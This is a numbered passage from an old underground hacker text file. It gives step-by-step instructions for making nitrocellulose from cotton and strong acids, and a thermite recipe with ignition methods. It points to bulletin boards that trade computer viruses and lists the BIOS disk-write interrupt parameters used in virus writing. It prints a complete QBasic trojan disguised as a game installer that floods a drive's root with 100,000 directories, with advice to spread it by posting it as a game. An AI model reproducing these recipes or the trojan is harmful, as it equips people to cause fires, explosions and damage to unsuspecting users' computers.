  712. (from Terrorist's Handbook)
  713. Materials: cotton, concentrated nitric acid, concentrated sulfuric
  714.            acid, distilled water
  715.  
  716. Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue
  717.            litmus paper
  718.  
  719. Procedure: 1.  Pour 10mL of sulfuric acid into beaker.
  720.             2.  Pour 10mL of nitric acid into beaker with sulfuric
  721.                acid.
  722.            3.  Immediately add 0.5 gram of cotton.
  723.            4.  Allow it to soak for EXACTLY three(3) minutes.
  724.            5.  Remove the nitrocellulose.
  725.            6.  Put the nitrocellulose into a beaker of distilled
  726.                water to wash it in.
  727.            7.  Allow the material to dry.
  728.            8.  Re-wash it.
  729.            9.  Once neutral(acid/base) it can be dried and stored.
  730.  
  731. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  732.  
  733. WHAT IS THERMITE AND HOW DO I MAKE IT?
  734. Thermite is a powder which burns incredibly hot (approx. 2200 deg C)
  735. and can be used to burn through most anything.
  736.  
  737. Materials: powdered aluminum, powdered iron oxide
  738.  
  739. Procedure: mix the two powders together as evenly as possible
  740.  
  741. Ignition:  thermite is difficult to ignite but these work
  742.             a) mix a small amount of potassium chlorate into the
  743.                thermite mixture and ignite with a few drops of
  744.                sulfuric acid
  745.             b) magnesium strip or 'sparkler' stuck into the powder
  746.                which is then lit as a fuse
  747.  
  748. =====================================================================
  749. V. Infection
  750.      (Virii, Trojans, Worms and other creepy crawlies)
  751.  
  752. WHERE CAN I GET SOME VIRII?
  753. The Virus eXchange BBS in Bulgaria.  [number not available - :( ]
  754. Problem:  They demand a virus they don't have in their archives to
  755. let you in.  Good luck finding one.  The best way is to write one,
  756. even if it's in BASIC. It'll probably get you in.  They have
  757. THOUSANDS of virii.  IBM, Mac, Amiga, ... And they accept 2400 bps
  758. from what I know! For more info, gopher to wiretap.spies.com and dig
  759. around in their online library under technical info.
  760.  
  761. There are alot of places in the US to get virii too:
  762. The Hell Pit in Chicago has over 1500, and they don't accept the
  763. lame stuff like the ones written in basic, so they're all good ones.
  764.  
  765. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  766.  
  767. INTS USED:
  768. (from Belisarius)
  769. You want Int 18h, AH=03h,
  770. Al==Num sectors to write
  771. BX==offset of pointer to buffer
  772. CH=cylinder Number
  773. Cl=sector number
  774. DX=head number
  775. Dl=drive numbers
  776. ES=segment of pointer with buffer
  777.  
  778. for CH=it's the low 8 bits of 10 bit cylinder number,
  779. for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits),
  780.                                    0-5=sector number.
  781. for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return:
  782. AH=status, AL=number of sectors written flags, carry set if an error.
  783.  
  784. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  785.  
  786. SAMPLE OF A TROJAN
  787. (from Spear)
  788.  
  789. This is a little trojan I wrote in Qbasic 4.5  It's a bitch!
  790.  
  791. REM bitch by Spear
  792. color 14,0
  793. print"installing datafiles...  Please wait..."
  794. print"This may take up to 20 minutes, depending on your computer..."
  795. shell "cd\"
  796. for a = 1 to 100000
  797. a$=str$(a)
  798. c$="md" + a$ + ".hee"
  799. shell c$
  800. next a
  801. cls
  802. print"Cybermattixx Version 1.0 is now installed on your system..."
  803. print"Have a shitty day!"
  804. print " ?AM?"
  805. print
  806. input "Hit ENTER To REBOOT your System now!";a$
  807. shell "boot.com"
  808.  
  809. How to use it?
  810. This can pose as the installation program for a game. This means that
  811. when you upload it to a BBS or something, and post that it is a
  812. kickass game, people will download it and try to install it on their
  813. computers!
  814.  
  815. What does it do?
  816. This program changes directory to the root and makes 100000 dirs in
  817. the root.  You cannot use deltree to wipe them out in one chunk and
  818. you CANNOT get rid of them without doing reverse engineering on the
  819. program, ie. rd instead of md.  To get rid of them any other way you
  820. would have to format c: or d:
  821.  
  822. -=-=-=-=-=-=-=-=-=-=-=-=-=- END of HAQ1.07/1 -=-=-=-=-=-=-=-=-=-=-=--=
  823.